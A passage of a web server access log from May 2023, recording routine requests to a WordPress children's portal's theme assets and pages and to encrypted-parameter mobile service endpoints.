Nlq/97tookDto2a0mOqaaIHFT4/FS5svU2LLQfFUwld6sist0MVFxrJKwg/grfL6QDxMI/hUhBwjXzw0f2QVCC6l7fVmubEniQ/atsxqaslcesWc/woRSa12hYKHhQBgXsv7UQLxgwpVib5mHvTk3UpscZd+3MNatRm/NtX/7A9b/Yg8SnmqlpiXe0PsTxNHGWuQjuREsbew70q3Tm/nA7Wwaq7WdRvD9vzDykyUxesLlvQm5hQwla1TR0OCa4QnG7g6ejlz6Wi1NO8PMzPvE0ph7GyPjBiJtivyXzdP9ZPyD0Yq7CMePQ4HVDE=&u=U2FsdGVkX18hTWG9B949E05yr/2gWluoY00KU826Bps=&y=U2FsdGVkX19RtpKQbIgOxgfB/y2GM7TvSdN7EoFt7V6Lp8UisMUnrixakuax9sP4 HTTP/1.1" 200 3333
186.102.16.114 - - [05/May/2023:08:05:21 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19XFHayEnLK/ViZYpnZDnuVCp1ZSpSS4YeNKgXyXlnRXZN2DSpBbOU4Qy50wM+bLZ8tJYCXa9jDYv0UboGdmMP2yo8s41jCZz8foDqFKpGWyH44cGxamh/r8zbierGakRYGmjmImS+x9COotT3dGat3ShkOrYTsv0cshVZCqxTAGajK/nDXaEs3gUo3k7XZtN9I1ePPyGql8plji5a6DOl1lSIYro5iMQIQ9BS5fj/raY+IuPpzj8JWBEmOsHXFJaXdSC3qKqTYiIXlyObm5D+81Cri///8L4EUelvoG+KKahkawbm7bP2Q0lqI0N3sTzra9Oq4wyVafkvGh1JgNM9U1zRzhOybOvL3kgBtjjjK3x46p/p3xlOcwORglI2wydPIL+PQmRP4PAhX9Gy8q/1efTS+vtuaGYTtUaQ4FJDCpXIBKpKBICxVL/vpp2kiuFxZuYuoCZt+IYjmvu/gLtJxz8isgbJP4Ee3ClbqaWFYPPfSqns7T5kuIAmbjd2idFyff9c9q8VXpqOVHefL3RPj2aubVuSDnDEOTvZK/siAlh18jIBoXwpi+G35VseDrspmB3lS0M/XOtqFbFZwWEfTNjLK6xyGDNot1aM8DG3byIv2Jh5Uze0L5Y8+x+iQDg5Dm/DLLMUTUYnwvDErjWMgzRksvoCsi3rO905guxes0CgLXa4mVE2idDxx/T7rOSfTXbBXFz+5+5JZ0IfbckebEq30uVtdy6hhRoN4v8WpsrjALhJReyKV&u=U2FsdGVkX18hTWG9B949E05yr/2gWluoY00KU826Bps=&y=U2FsdGVkX19RtpKQbIgOxgfB/y2GM7TvSdN7EoFt7V6Lp8UisMUnrixakuax9sP4 HTTP/1.1" 200 208
186.102.16.114 - - [05/May/2023:08:05:21 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19qfWFD+l6+fkOi9bzm99KFoUjz+AQZ/ILlEvhXjq9DCONy0ylQYQpk HTTP/1.1" 200 31032
61.135.159.166 - - [05/May/2023:08:06:43 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/May/2023:08:05:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.84 - - [05/May/2023:08:07:20 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90406
201.245.192.253 - - [05/May/2023:08:07:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.33 - - [05/May/2023:08:07:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
52.167.144.33 - - [05/May/2023:08:07:38 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
52.167.144.33 - - [05/May/2023:08:07:38 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
52.167.144.33 - - [05/May/2023:08:07:38 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
52.167.144.33 - - [05/May/2023:08:07:38 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
52.167.144.33 - - [05/May/2023:08:07:39 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
52.167.144.33 - - [05/May/2023:08:07:39 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
172.22.2.4 - - [05/May/2023:08:06:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
40.77.167.84 - - [05/May/2023:08:07:45 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
40.77.167.84 - - [05/May/2023:08:07:45 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
40.77.167.84 - - [05/May/2023:08:07:45 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
40.77.167.84 - - [05/May/2023:08:07:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
40.77.167.84 - - [05/May/2023:08:07:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
40.77.167.84 - - [05/May/2023:08:07:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
40.77.167.84 - - [05/May/2023:08:07:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
40.77.167.84 - - [05/May/2023:08:07:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
40.77.167.84 - - [05/May/2023:08:07:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
40.77.167.84 - - [05/May/2023:08:07:46 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
40.77.167.84 - - [05/May/2023:08:07:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
40.77.167.84 - - [05/May/2023:08:07:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
52.167.144.139 - - [05/May/2023:08:07:56 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
52.167.144.139 - - [05/May/2023:08:07:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
52.167.144.139 - - [05/May/2023:08:07:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
52.167.144.139 - - [05/May/2023:08:07:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
52.167.144.139 - - [05/May/2023:08:07:58 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
52.167.144.139 - - [05/May/2023:08:07:58 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Parque-entrenubes.mp4 HTTP/1.1" 200 10769342
52.167.144.139 - - [05/May/2023:08:08:20 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
52.167.144.139 - - [05/May/2023:08:08:20 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
